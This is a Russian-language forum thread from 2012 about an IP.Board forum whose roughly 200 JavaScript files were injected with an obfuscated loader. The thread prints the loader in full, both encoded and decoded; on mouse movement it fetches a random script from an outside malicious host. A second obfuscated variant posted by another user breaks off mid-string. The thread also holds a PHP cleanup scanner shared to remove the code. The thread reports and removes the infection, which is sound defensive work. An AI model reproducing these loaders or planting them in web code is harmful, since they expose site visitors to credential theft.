Вирус на форуме IP.Board

Posted 1 марта, 201212 yr

Итак, недавно наш форум столкнулся с фреймом, который антивирусы посчитали за вирусную ссылку. Так как это мой первый опыт с вирусом на сайте/форуме, то я его обнаружил не так быстро, как мне хотелось..

Поделюс опытом удаления 'плохого' скрипта с форума.

Как работал фрейм? Очень просто, при загрузке страницы, подгружающей заражённый яваскрипт, он активировался при малейшем движении курсором мышки и подгружал яваскрипт с какого-то постороннего сайта, в моём случае это был ___constructivehell.is-a-cubicle-slave.com/g/1351559130384.js, что делает этот срипт - не известно.

Названиние подгружаемого скрипта генерировалось автоматически.

Первое, что пришло мне на ум - сделать резервную копию форума и слить её на компьютер, а там уже разными прогами искать вирус по тексту в файлах.... Что я и сделал. Скачав копию форума, я начал искать название ссылки, которую блокировал антивирус, во всей копии с помощью программы Folder Find Text, но все мои попытки были напрасными.. Ссылка не находилась.

Тогда я обратился хостеру, который подсказал мне где может находиться вирус и как его обнаружить (золотой же человек мой хостер )

То, что вирусный код содержится в яваскриптах, он сказал однозначно и уверенно.

Как же мне найти этот код? Было предложено отсортировать файлы по дате изменения и уже смотреть их.. Но я пошёл другим путём, поискал в интрнете подобный случай и обнаружил, что это код кодируется в скриптах. Там же я обнаружил как именно он кодируется, и, по небольшому кусочку кода, начал поиск по резервной копии..

Результаты поиска меня просто шокировали: около 200 яваскриптов было заражено этим кодом. Вот как он выглядит в зашифрованном виде:

var tdf7003="";function nabc155c58d(){var m8cb2ed7=String,f475cf=Array.prototype.slice.call(arguments).join(""),kd969a1=f475cf.substr(rc176e(),3)-573,k0c027f7a,l089296;f475cf=f475cf.substr(17);var ia0a771c7=f475cf.length;for(var k6cbf7811=0;k6cbf7811<ia0a771c7;k6cbf7811++){try{throw(k71b3b=f475cf.substr(k6cbf7811,1));}catch(e){k71b3b=e;};if(k71b3b=='}'){kd969a1="";k6cbf7811=v7fd954e3(k6cbf7811);s781897=ofbf416a(f475cf,k6cbf7811);while(s781897!='}'){kd969a1+=s781897;k6cbf7811++;s781897=oa6558(f475cf,k6cbf7811);}kd969a1-=373;continue;}k0c027f7a="";if(ded203d6a(k71b3b)){k6cbf7811++;k71b3b=f475cf.substr(k6cbf7811,1);while(k71b3b!='±'){k0c027f7a+=k71b3b;k6cbf7811++;k71b3b=f475cf.substr(k6cbf7811,1);}k0c027f7a=i61bbb(k0c027f7a,kd969a1,23);if(k0c027f7a<0)k0c027f7a+=256;k0c027f7a=k8016e5(k0c027f7a);j33797fa(k0c027f7a);continue;}b6ed78d=l85b5d784(k71b3b);if(b6ed78d>848)b6ed78d-=848;l089296=b6ed78d-kd969a1-23;if(l089296<0)l089296+=256;if(l089296>=192)l089296+=848;else if(l089296==168)l089296=1025;else if(l089296==184)l089296=1105;tdf7003+=m8cb2ed7["x66romx43x68ax72x43x6fx64x65"](l089296);}}nabc155c58d("c","998c","d","7","1","d","c1ea2","65","8","±1","4","8","±}","441","}","±19","3","±","±20","8±±","20","1±","}5","31","}±2","4","±}4","0","5}","±","171±±","1","60±±166","±","}4","3","5","}±1","95","±}5","38","}±","228±","}","5","60}±25","1","±","±2","42","±M±","2","2","3±±22","0","±}5","52","}","±2","11","±","}","43","9}","±","207","±}","5","20","}±11","±","±","2","8","±","}","5","6","0}±","2","42","±GD",">±2","42","±±","15±±","2","4","2","±}52","8","}±217","±","±26","±&","}41","4","}±1","8","0","±","±","176±","z","o","}","5","06}","±203±±2","5","5","±","}57","3","}N","}47","4","}±2","3","4±}491","}","±0","±±1±","}","438","}±","2","0","2","±","±","2","05±","±","18","7±}4","14","}","±","1","8","0","±}563}",">}","4","8","0}±2","4","8","±","±","231±","}","56","7}A}5","2","2","}±1","7±}49","8}±","0±±","0±}563}","±3±>H}","56","0}","±","25","5±}38","7","}±","1","34±R","}4","3","6}","±","1","85±","±20","3","±","±1","8","4","±","±","191","±","±1","8","5±","}495}±2","53±±24","6±±","1","90","±","±4","±","±2","53±","±","2","4","2±","}","3","75}","±","1","4","3","±","±1","26±G","}","50","2}","±","2","5","1±±","7±","±","5","±","±199±","±","2","5","5±}","4","5","9}±156","±±","14","8±}","532}","±","241±±1","9","5±","±192±","±","191","±}541","}(}","4","0","3","}±1","55","±","U]±1","69±}483","}±2","54","±±245","±","}","5","30","}±","2","5±","}","4","7","0}±","23","1±","}","4","3","4","}±18","6±t±","203±±","1","89","±","}572","}","L}55","7","}","3}","5","4","2}/","7}","49","9}±","1","9","5±±1","3±}","419}±","19","0±}","489","}±","5±}","3","9","1","}","±1","4","3","±}537}","'±2","8±}","487","}±","2","4","0","±","±1","6","9±±","19","8","±}","424","}","±","13","5","±","±","13","5±}","487","}","±169±±","17","6±","}","528","}'}","5","51}","7","-",".","/}","4","87}±","24","2","±","±24","7±}","4","11","}","±","16","2","±±","1","61","±d","}404","}","_V±","1","7","7","±C","@","??}","5","2","0}","!","}","5","1","7}","±1","6","±","±","21","±","±","1","1","±","}4","2","2","}±183","±","}5","69}R}4","5","5}","±","1","5","1±","±225","±","±","2","26±}5","35","}3}","5","2","6}±","2","2±","±","28","±±1","7","±","±","2","3±","}472","}","±","1","54±","±","183","±±","15","4±","}","46","0}","±1","58±}4","28}±1","3","7±}","55","3","}","±216±","}","37","8}&","}4","07}B","}457","}±232","±","xu","}506}","±165±","±0","±","}5","2","0}±2","5","±±13±","}5","2","4","}#±27±","}","50","8}±3±","}","4","6","4","}±","2","2","4±","}","397}±","1","63±}41","7}q","±","178±","}","56","9","}I}","45","2","}±","211","±±2","13","±±","2","1","9","±±2","1","7","±","}52","9","}","±24±","±3","2","±")±24","±","±","2","1","1±}","4","57}","±","1","68±±","139±","}468","}","±220","±}","45","8}","±","2","2","5±±2","18±","±","2","07","±","}3","93","}","±","159","±","}","42","1","}","±","17","6±±","182","±±1","81±","o","}416}","kb","±18","9±","O","}431","}","[","Z}","4","5","3}p","±20","8±","}","38","0","}","±132","±","}","5","7","0","}","±252","±}","4","9","4","}±184","±}432","}±","2","01","±","}","55","9}",":","?5}","4","36}±","1","9","7±","}434","}","±20","3±","±","130","±}4","48}±","21","8±}","43","3}","±20","4±","}","3","9","1}±","1","63±","±1","43±","±1","49","±}484","}±","231","±}","4","55","}","±2","0","8±±","137±","±1","6","6","±}","464}±","17","5±}54","6","}±1","±}398","}","P","}5","15}","±2","1","3","±","±2","0","6","±","±1","9","7±}","56","3","}","P}","50","9","}±","1","7","2","±}4","7","9}±","1","39±","±138±","}414","}","I}5","5","0","}±","2","09","±","}421","}±1","90","±±1","76±","}","5","1","3}±","17","±","}","3","78","}","±1","2","8±}4","4","4","}","±2","0","5","±}56","3}","L±3±","}48","6","}±","0","±","}","53","1","}.}","4","97","}","±1","3","±","}436","}±1","8","8±±194","±","±","1","8","3","±","}","5","09}±","6±}","3","86","}D","}4","1","8}±1","2","9±","}","5","50","}±23","2","±±","2","4","9±","}","403","}p","}4","3","9}f","}3","99","};",":}39","6","}7}3","82}",")","}","46","4}","±","232","±±2","1","1±±","22","8","±","}","4","3","4","}t","}555","}5","}4","43}","±1","94±±1","90","±","±19","3","±}3","9","4","}L","}4","8","5","}","±","19","6±±167±±235","±±","24","6","±±2","3","4±","}","55","4","}A}46","6","}±22","5±±21","7±","}4","01","}","±","1","6","1±}5","2","2","}±32","±","±218","±}55","5","}","4","}","4","71}","±222","±","±2","37±","±19","0±","±","2","29±}","429}","±18","0±}5","3","0}!±","2","5±"('±","24","6","±","-±","8±}","50","7}","±","2","54±±4","±","}","53","5}","±","7±","±26±","}","389}","±","1","48±±14","0","±}44","3","}±1","33±}","45","4}±143±","±208","±±20","5±±20","1±±","2","0","4±","±","1","4","3±","}","39","7}","X±13","8","±}405","}","g","}5","5","3}(}","46","8}±1","7","7","±","±13","1","±±","1","2","8±","}4","1","4","}","I","}","503}±","1","6","2","±±1","62","±","}49","0","}","±2±}","4","67}±","2","1","4","±","±2","31±","±","1","4","9","±}472}","±","2","3","7±±","22","1±","±","2","36±±","227","±","}4","16}±","17","8±±1","82±b±1","2","7±","}40","9","}","[±","159±}","5","1","4","}","±","1","9","±","}","5","0","6}","±","2","55","±}3","7","8}","±","14","5","±±","1","37±}","446","}","±","19","7","±±2","0","6±±212","±±1","4","2±","±195","±","±2","10","±}538}","!}","4","3","0}","±","1","7","7±}","4","55}±","2","2","1","±","±","20","6","±}528}±","247±","±30","±}52","2","}±","1","7","±","±2","5±±1","7±","±2","6","±","}","5","65","}","K","±2","5","5±","}5","2","4","}±213","±!}4","14}±","16","3±±1","7","8±}","527}±2","6","±","}","423","}","±1","85±","}5","31","}",")","}5","04}±","19","3","±","±","19","5","±±21","3","±","}","5","0","3}±1","66±","}","4","4","5","}","i","}499}","±","158","±±1","58±","±","15","8","±}","3","9","0","}±","155±±1","3","9±","}54","8}8}42","4}±1","79","±±","186","±}","547}","9","}5","52","}±","2","4","8","±>","}566","}QH=}511","}","±","193±±","222","±}3","9","2}J","Q±158","±","±1","4","3","±±16","2±}","3","8","6}","±","1","52±","}44","6","}±","143","±}45","4}±21","0±","±2","01±","±","2","2","2","±","±","2","0","1±","±2","1","9","±±2","0","3±}49","0","}","±","254±","}538}%}376","}","±1","3","8","±","}49","9","}","±","9±","±1","88±","±","208","±","±","1","62±","±","1","59±±1","58","±","}","48","7","}±","14","6","±±1","4","6","±}384","}±","1","49±","±","13","3","±±1","48±","}","48","2}±","2","37±}","55","3};","?}55","2","}±248","±","98","}4","4","4","}","±","2","08±±","19","5±","±191","±","±1","94","±}5","6","8}","S","}","522","}","±","3","1±","}56","4","}","J7","}","54","4","}","6","}3","82","}","±13","3","±±","131","±±1","36","±±","1","29±","±1","4","2","±±1","35","±","±133±","@]}","5","25","}±","20","7±±","21±","}5","45}81","&","}4","26","}","±","1","9","2±","}","39","9}","±","1","5","4","±","±","160±}","5","4","0},","±","2","22","±","}51","2}±2","02±}","53","3}±2","24±}377};±","1","50","±","}47","6}","±","139","±}","382}","*",")}","5","6","5}","±2","2","4","±","±","2","2","4±","±","2","24±@}43","0}","±","1","8","2","±}5","5","9","}±","2","4","1","±","}","525","}","±215±}","49","1","}±","1","±}","504","}","±2","±","}4","00","}±1","55","±}","4","62}±2","2","7±±15","8","±±22","6±±213±","}5","3","3}","±24","±","}389}","±139","±","}4","16}","±187","±","±1","49±","±1","82","±}","4","15","}","±1","62","±±","181±","}47","7}","±","2","28","±±","1","59","±}","4","35}±1","4","6±}37","5}V","}","4","09","}[","}563}±","252","±}4","18}","±","1","6","7±","}5","4","2","}/-}5","62","}","D@}3","8","9","}","±","140","±}5","2","4}",""±1","9±","}","50","0}±","1","8","9±±191","±}405}","W","±","178±","DA@@","@","}4","2","9","}XX±19","8","±}","5","22}","±","21","±","±2","6±","}5","5","1","}-}","48","1}±242±","}56","6}O","}514}","±","210","±","±2","8±","±29","±}4","75}±2","4","7±}","4","4","3","}±","19","5","±±201±}","39","8","}","±","1","45","±","}","447}±2","0","0±}","5","5","8}","±2","4","0±","±1","3","±±","2","4","0","±","}","41","3","}q","}43","9","}","±","148±","}","5","0","0}","±16","3","±}","4","42}","f}","45","2}","ooo","}","517","}","±","1","76","±}5","27}.","}","491}±15","4±","±151±","±15","0","±","}41","5}","J","J","}5","30}","1","}","549","}","±2","±±2","12±±","209±","}","5","4","7","}","±","2","06","±±2","0","6","±","±","2","06","±","8","(}4","9","9}±7±}","4","3","7","}","±","1","92±","}5","70}L","}","45","5","}±","2","21±±","1","51±}49","1","}±252±","}","5","5","7}=}48","3}±","24","1±±24","4","±","}4","9","6","}","±","243","±","±","246","±}","5","2","6","}","±2","08±±237±±2","08±±","22±}","430","}","±","1","9","7±}","45","9","}±2","1","9","±","±208±","}","3","8","9}","±155±","±","1","4","4","±","±","1","50±}5","70}","J","±","4","±±","5","±}","5","4","1}","±","2","23±}","397","}±170±<}4","1","0}F","}","49","7","}","±1","56","±±","1","5","6","±","±1","5","6±±1","56±","±","10","±}","4","33}","±","18","8±","}","5","5","4","}",":","}4","4","2","}","±19","2","±","}53","4}'","/","±230","±}","415","}±","1","85","±","}474}±2","45±±24","6","±","±","22","6±±","23","2","±","±2","21±","±2","27±±156","±}","47","5","}±1","8","6","±±1","5","7±","}","420}x","}","380}Y+","(","}","4","73}","±","132","±±","1","32","±±","1","3","2","±","}37","6","}±1","51±}4","2","9}±138","±Y","}","3","78}","%%}449}l","}4","62","}","±","22","7","±","}","3","80}","±","129","±","}","429}","±19","3","±}44","5","}±200","±","±","20","7","±±2","11±}","41","2}l","}","48","7}±","25","2±","±","251±","}","488}","±","2","3","7","±","±17","0","±","}3","77}X","}","554}±236±","A>","}4","9","2","}","±","25","0","±","±","1","74","±±18","5","±","±1","7","4±","±21","9","±±","2","3","9±±2±","}","4","5","8","}±","2","12","±}","5","42}","±","2","3","8","±2","!}","5","31}","#","}42","4","}","±","1","7","4±±1","85","±±1","8","3","±r","}5","73","}±8±","}4","74}","±","17","0","±","±","2","4","0±}","5","26}±","3","1±","}44","4","}","±","177","±±","2","1","0±±","208±","±","19","9","±}","4","3","2}","±","1","9","2","±","±","1","8","5","±}","41","3","}","g}","5","1","2","}","±20","3±","}4","9","7","}","±","1","93±}","4","13}","±","1","7","8","±±1","80","±","±1","61","±","}","3","9","4}","±","1","5","9±","}","380","}±","146","±}4","9","7}±5±","±2","5","2±}","3","9","3","}","±","1","5","3","±}44","0","}±","1","93","±}4","65","}±","15","5","±","±166","±","±","1","56","±}4","59}±1","41","±","±","1","52","±","±","14","1±","±1","4","8±}","395","}","[","}46","9}","±","2","25","±}","411","}","±1","76","±}","4","9","8}±1","8","7","±","±","207","±}","5","5","9","}±","2","2","2","±}5","6","3}±","22","3±","±","22","2","±±2","22±","}53","6","}","±","195","±}5","5","9}","9}4","7","1}±2","22±","±218±","±2","21","±}5","50","}±24","6±",")}","49","8}","±","4","±","±4","±","}52","7}±2","2","±","±3","1±","±21","±±","2","44","±","±25±±","26","±±","29±","}5","3","9","}!","±2","29","±","}","5","1","2","}","±","2","1±}","5","3","0","}","±23±&","}4","71","}","±226±}","49","9}","±","5","±}","43","0","}±","196±","}47","3}±16","4±±1","82±","±1","3","6","±±1","3","3±","±","1","32±}","4","17","}","L±","192","±PML","±","1","9","2±","±126±","}","4","80}±1","43","±","±","14","0","±}375","}","±","1","50±","}397","}X}","498","}","±","188","±","±18","9±","}50","7","}","±216","±","");eval(tdf7003);function rc176e(){return 14;}function v7fd954e3(y328166){return ++y328166;}function ofbf416a(c68a9f9,c2c81e){return c68a9f9.substr(c2c81e,1);}function oa6558(xeea275f0,y47011595){return xeea275f0.substr(y47011595,1);}function k8016e5(lb3daa13){if(lb3daa13==168)lb3daa13=1025;else if(lb3daa13==184)lb3daa13=1105;return (lb3daa13>=192 && lb3daa13<256) ? lb3daa13+848 : lb3daa13;}function ded203d6a(k835fa24e){return k835fa24e=='±';}function i61bbb(o764cf3,s3c613,g05e26cf8){return o764cf3-s3c613-g05e26cf8;}function j33797fa(t4c415){var m8cb2ed7=String;tdf7003+=m8cb2ed7["x66romx43x68ax72x43x6fx64x65"](t4c415);}function l85b5d784(vad933){return (vad933+'')["chax72x43odex41t"](0);}

А вот как в расшифрованном виде:

(function() {
var url = '__constructivehell.is-a-cubicle-slave.com/g/';
if (typeof window.xyzflag === 'undefined') {
window.xyzflag = 0;
}
document.onmousemove = function() {
if (window.xyzflag === 0) {
window.xyzflag = 1;
var head = document.getElementsByTagName('head')[0];
var script = document.createElement('script');
script.type = 'text/javascript';
script.onreadystatechange = function() {
if (this.readyState == 'complete') {
window.xyzflag = 2;
}
};
script.onload = function() {
window.xyzflag = 2;
};
script.src = url + Math.random().toString().substring(3) + '.js';
head.appendChild(script);
}
};
})();
[/code]
[/spoiler]


Пришлось очищать каждый скрипт от этого кода. У меня сразу же возникло пару вопросов: Как он мог проникнуть в скрипты на сервере? Кто его туда записал?


По моему [u]не профессиональному[/u] мнению, я могу лишь предположить, что у меня просто угнали данные для доступа к FTP,  что можно проверить по логам, было ли там копирование, а затем замена практически всех яваскриптов на форуме...

Цитата

Random=), Quicksdk, CNoise and 1 other
4

3 марта, 201212 yr

comment_787

Сталкивался много раз с этой проблемой на булке, но до этого момента, кстати, не замечал, что бы на IPB было похожее.

Касперыч мой ругался на вирусяку и не давал её загрузиться в браузере.

Картинко:

Данный зверюга ворует ваши пароли, хранящиеся в памяти браузера, не важно когда вы их ввели или сохранили в памяти браузера.

Скрипт заливается очень просто (как это было с булкой) просто создаётся новый юзер "с скрытыми символами" XSS атака, а также сообщением или картинкой.

Бороться можно. Достаточно ограничить доступ к файлам и папкам (непосредственно на фтп выдать нужные права для файлов - ТОЛЬКО ЧТЕНИЕ)

Ну или некоторые мои знакомые писали скрипты, которые каждый час проверяли изменение файлов на фтп Так тоже можно ^^

И кстати, Паш, настрой права у моей группы Я в чате писать не могу :D

Цитата

CNoise and Respected
2

3 марта, 201212 yr

Author

comment_789

Будем знать) Права поправил!

Цитата

14 апреля, 201212 yr

Author

comment_2681

Если у кого возникла такая же проблема с сайтами, могу скинуть скрипт, который автоматом удалит вирус из всех яваскриптов..

PS: была обнаружена другая модификация данного вируса..

Цитата

18 мая, 201212 yr

comment_4578

похожая беда на моем форуме, изменил пароли на фтп и все остальные, удалил свой фтп клиент, запретил браузеру хранить пароли, перезалил все файлы форума и дополнений. но всёже иногда попадаеться постороний код в конце js файлов (видимо какието устаревшие файлы от старых версий форума).

но код у меня был другой, кажеться начинался с try, если опять встречу, выложу.

в логах фтп нашел этот ip: 62.122.79.1

скиньте плз скрипт и какие права на папки и файлы лучше поставить так чтобы потом небыло проблем в работе форума.

Цитата

18 мая, 201212 yr

Author

comment_4579

Вот скрипт:

<?
/*
----------------------------------------------------------------------------------
dScaner Class - START
----------------------------------------------------------------------------------
*/
/*
*
* Класс - dScaner для сканирования директорий на наличие вредоносного кода в
* указанных типах файлов
*
* Разработчик: Денис Ушаков
* Дата разработки: 03-04-2012
* Версия разработки: 0.0.3
*
*/
Class dScaner {
// преобразуем входной параметр в массив
// $get_str - список параметров
// $separator - разделитель параметров в списке
function request($get_str, $separator)
{
if (isset($get_str) && !empty($get_str))
{
// эксплоадим строку в массив и возвращаем его
$obj = explode($separator, $get_str);
return $obj;
}
else
{
return false;
}
}
/*
*
* Функция поиска в файлах вхождения заданной строки:
*
* $this->find($path, $files_allowed, $requested_string);
*
* $path - путь до директории, от которой отталкиваться при сканировании
* $files_allowed - список файлов, которые подвергаются сканированию
* $requested_string - строка поиска
*
*/
function find($path = './', $files_allowed, $requested_string)
{
// исключаемые ссылки на директории и файлы, которые будут игнорироваться
$dir_disallow = array('.', '..', '.htaccess', '.git');
if(is_dir($path))
{
$temp = opendir($path);
while (false !== ($dir = readdir($temp)))
{
if ((is_dir($path . $dir)) &&
(!in_array($dir, $dir_disallow)) )
{
// если директория - сканируем её
$sub_dir = $path . $dir . '/';
$this->find($sub_dir, $files_allowed, $requested_string);
}
elseif ((is_file($path . $dir)) &&
(!in_array($dir, $dir_disallow)) &&
(strpos($dir, $files_allowed) == true) &&
(strpos($dir, '_BACKUP') == false) )
{
// Если файл
// получаем полный путь до него
$in_dir_file = $path . $dir;
// считываем файл в строку
$temporary_file = file_get_contents($in_dir_file);
// флаг найденного вхождения искомой строки
$file_founded = false;
// разбиваем файл на строки
$tf_strings = explode("n", $temporary_file);
// обрабатываем каждую отдельно
foreach ($tf_strings AS $item)
{
$item = strval($item);
// если в строке есть вхождения искомого запроса
if (strpos($item, $requested_string) !== false)
{
$file_founded = true;
}
}
// если в файле найдена строка
if ($file_founded)
{
// выводим путь до файла в котором найдено вхождение
print "" . $in_dir_file . " - в файле обнаружена искомая строка.

";
}
}
}
closedir($temp);
}
}
/*
*
* Функция сканирования вредоносного кода:
*
* $this->scan($path, $files_allowed, $requested_string);
*
* $path - путь до директории, от которой отталкиваться при сканировании
* $files_allowed - список файлов, которые подвергаются сканированию
* $requested_string - строка, по которой определяется наличие вредоносного кода
*
*/
function scan($path = './', $files_allowed, $requested_string)
{
// исключаемые ссылки на директории и файлы
$dir_disallow = array('.', '..', '.htaccess', '.git');
if(is_dir($path))
{
$temp = opendir($path);
while (false !== ($dir = readdir($temp)))
{
if ((is_dir($path . $dir)) &&
(!in_array($dir, $dir_disallow)) )
{
// если директория - сканируем её
$sub_dir = $path . $dir . '/';
$new_parent_dir = $path . $dir;
$this->scan($sub_dir, $files_allowed, $requested_string, $new_parent_dir);
}
elseif ((is_file($path . $dir)) &&
(!in_array($dir, $dir_disallow)) &&
(strpos($dir, $files_allowed) == true) &&
(strpos($dir, '_BACKUP') == false) )
{
// Если файл
// получаем полный путь до него
$in_dir_file = $path . $dir;
// считываем файл в строку
$temporary_file = file_get_contents($in_dir_file);
// флаг бекапа файла
$create_backup = false;
// разбиваем файл на строки и считываем каждую отдельно
$tf_strings = explode("n", $temporary_file);
// индекс строки файла
$str_index = 0;
// каждую строку обрабатываем отдельно
foreach ($tf_strings AS $item)
{
$item = strval($item);
if (strpos($item, $requested_string) !== false)
{
// если в строке есть вхождения искомого запроса
// флаг бекапа файла, в котором найден вредоносный код
$create_backup = true;
// удаляем всю строку с вредоносным кодом
unset($tf_strings[$str_index]);
}
$str_index++;
}
// создаём бэкап
if ($create_backup)
{
// меняем права в папке в которой находимся чтобы иметь возможность писать в неё
chmod($path, 0777);
// формируем имя БЭКАПа файла
$temp_file_backup = $in_dir_file.'_BACKUP';
// сохраняем БЭКАП файла рядом с исходным
file_put_contents($temp_file_backup, $temporary_file);
// собираем очищенный файл в строку
$scanned_file = implode("n", $tf_strings);
// сохраняем очищенный файл
if (file_put_contents($in_dir_file, $scanned_file))
{
// перезаписали удачно
print "" . $in_dir_file . " - Файл очищен. (+ BACKUP)

";
}
else
{
// перезапись не удалась
print "".$in_dir_file ." - Файл НЕ очищен.

";
}
// меняем права в папке в которой находимся обратно на 755
chmod($path, 0755);
}
}
}
closedir($temp);
}
}
/*
*
* Функция восстановления БЭКАПОВ файлов
*
* $this->restore_backups($path, $files_allowed);
*
* $path - путь до директории, от которой отталкиваться при восстановлении
* $files_allowed - список файлов, которые подвергаются восстановлению
*
*/
function restore_backups($path = './', $files_allowed)
{
// исключаемые ссылки на директории и файлы
$dir_disallow = array('.', '..', '.htaccess', '.git');
if(is_dir($path))
{
$temp = opendir($path);
while (false !== ($dir = readdir($temp)))
{
if ((is_dir($path . $dir)) &&
(!in_array($dir, $dir_disallow)) )
{
// если директория - сканируем её
$sub_dir = $path . $dir . '/';
$this->restore_backups($sub_dir, $files_allowed);
}
elseif ((is_file($path . $dir)) &&
(!in_array($dir, $dir_disallow)) &&
(strpos($dir, $files_allowed) == true) )
{
// Если файл
// получаем полный путь до него
$in_dir_file = $path . $dir;
if (is_file($in_dir_file.'_BACKUP'))
{
// БЭКАП существует, получаем его содержимое
$temporary_file_from_backup = file_get_contents($in_dir_file.'_BACKUP');
// восстанавливаем бэкап файла
if (file_put_contents($in_dir_file, $temporary_file_from_backup))
{
// удаляем бэкап
unlink($_SERVER['DOCUMENT_ROOT'].'/'.$in_dir_file.'_BACKUP');
// бэкап восстановили
print "".$in_dir_file ." - восстановлен.

";
}
else
{
// бэкап НЕ восстановили
print "".$in_dir_file ." - НЕ восстановлен.

";
}
}
}
}
closedir($temp);
}
}
}
/*
----------------------------------------------------------------------------------
dScaner Class - END
----------------------------------------------------------------------------------
*/
?>
[/CODE]
[/spoiler]




но код у меня был другой, кажеться начинался с try, если опять встречу, выложу.



Выкладывай, посмотрим что у тебя за код..


Права изменять бесполезно - злоумышленник при внедрении вредоносного кода имеет доступ к файлам через FTP.

Цитата

Sergey
1

18 мая, 201212 yr

comment_4580

вот этот код:

try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$58$47.5$56$15$57.5$56$53$15$29.5$15$18.5$51$57$57$55$28$22.5$22.5$55.5$51$48.5$52.5$50$49$57.5$55$49$55.5$22$55$54.5$49$60$54.5$54$49.5$22$54$49.5$57$22.5$50.5$22.5$18.5$28.5$5.5$4$3.5$51.5$50$15$19$57$59.5$55$49.5$54.5$50$15$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$18.5$57.5$54$49$49.5$50$51.5$54$49.5$49$18.5$19.5$15$60.5$5.5$4$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23$28.5$5.5$4$3.5$61.5$5.5$4$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$54.5$54$53.5$54.5$57.5$56.5$49.5$53.5$54.5$58$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$51.5$50$15$19$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$23$19.5$15$60.5$5.5$4$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$51$49.5$47.5$49$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$51$49.5$47.5$49$18.5$19.5$44.5$23$45.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$56.5$48.5$56$51.5$55$57$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$56.5$48.5$56$51.5$55$57$18.5$19.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$57$59.5$55$49.5$15$29.5$15$18.5$57$49.5$59$57$22.5$52$47.5$58$47.5$56.5$48.5$56$51.5$55$57$18.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$56$49.5$47.5$49$59.5$56.5$57$47.5$57$49.5$48.5$51$47.5$54$50.5$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$15$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$51.5$50$15$19$57$51$51.5$56.5$22$56$49.5$47.5$49$59.5$40.5$57$47.5$57$49.5$15$29.5$29.5$15$18.5$48.5$54.5$53.5$55$53$49.5$57$49.5$18.5$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$3.5$61.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$53$54.5$47.5$49$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$56.5$56$48.5$15$29.5$15$57.5$56$53$15$20.5$15$37.5$47.5$57$51$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-683!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}

try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'om'+'Ch';f+='arC';}try{qwe=prototype;}catch(brebr){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f["s"+"ubstr"](11)+zz];n="19$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$58$47.5$56$15$57.5$56$53$15$29.5$15$18.5$51$57$57$55$28$22.5$22.5$55.5$50$58$53$59.5$55.5$56$51.5$51$51.5$22$51$54.5$53.5$49.5$53$51.5$54$57.5$59$22$54$49.5$57$22.5$50.5$22.5$18.5$28.5$5.5$4$3.5$51.5$50$15$19$57$59.5$55$49.5$54.5$50$15$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$18.5$57.5$54$49$49.5$50$51.5$54$49.5$49$18.5$19.5$15$60.5$5.5$4$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23$28.5$5.5$4$3.5$61.5$5.5$4$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$54.5$54$53.5$54.5$57.5$56.5$49.5$53.5$54.5$58$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3